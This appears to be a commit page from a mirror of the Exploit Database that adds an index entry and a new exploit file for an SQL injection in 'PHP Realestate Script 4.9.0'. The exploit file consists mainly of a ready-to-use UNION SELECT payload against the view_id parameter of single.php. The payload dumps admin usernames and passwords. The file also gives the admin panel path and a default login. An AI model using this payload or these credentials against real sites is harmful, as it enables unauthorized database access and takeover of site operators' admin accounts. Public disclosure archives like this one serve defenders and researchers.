bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-05-28

Browse source 
1 new exploits

PHP Realestate Script Script 4.9.0 - SQL Injection
This commit is contained in:
Offensive Security 2016-05-28 05:05:01 +00:00
parent 2e7bce9702
commit ab85a62fd6
2 changed files with 17 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
files.csv
View file

@ -36047,3 +36047,4 @@ id,file,description,date,author,platform,type,port
39861,platforms/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0
39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80

Can't render this file because it is too large.

16
platforms/php/webapps/39864.txt Executable file
View file

@ -0,0 +1,16 @@
# Exploit Title: Property Agent RealeState Script Sql Injection
# Date: 2015-05-27
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage:
http://www.phpscriptsmall.com/product/php-realestate-script/
# Version: 4.9.0
Exploit :
http://server/[path]/single.php?view_id=-99999+[SQl+Command]
Test :
http://server/single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin_login
Admin Panel : http://server/admin/
Username : admin
Password : inetsol